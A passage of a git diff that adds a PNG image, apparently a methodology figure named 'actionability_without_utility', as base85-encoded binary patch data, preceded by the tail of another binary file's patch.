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
Q4F(|aboFyt=akR{0HsD1YybcN

literal 0
HcmV?d00001

diff --git a/src/assets/methodology/actionability_without_utility.png b/src/assets/methodology/actionability_without_utility.png
new file mode 100644
index 0000000000000000000000000000000000000000..34ea59576ebc7b40e1d7f11c73d3a2e19c82d91b
GIT binary patch
literal 96082
zcmeFYWmsI@vM!1R3BfJ6OR&b>2?PryxLcrccXtSG!7aE$pmEpWH0~atgEsDR`&;Mi
zbJp7X{=NS$&wP;X$>-Bn4M9Np=AH1Ia~7UL6(o<%??e9S)8PPX42$x~JiB4vH`SAjQyYy9f1&
z#KDXjHUW|(6`E-;`^`qXv9!7^6Szj(%l&u>{o)tZTlYFRGy{o*q)@{mCdV`>=XR*L
z54}&CqCH@_eRb^l=F$txMOgSU4?2E2>0q({nudyk8VL8FmxMl=oD&;)Sjc~S9S#*c
zlvoJ8~h*lhY~;hk0t&;xSIzafmjd`B{gL{XBDX;m^n~F3DpdU
zv8Gb@Rl)0g?V9rgc37aqdjxFYUm7YngnzDtVWgGY5m&R4S1tOsh0pUk1oW4S^v-U^
z!l(mL54
zgn3t17X7{VTtGKpWJs8{lMq*3(;Hg=tl>K@Y+Y`|bj_r@Z~Nbf-h%#gc�?visI?
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
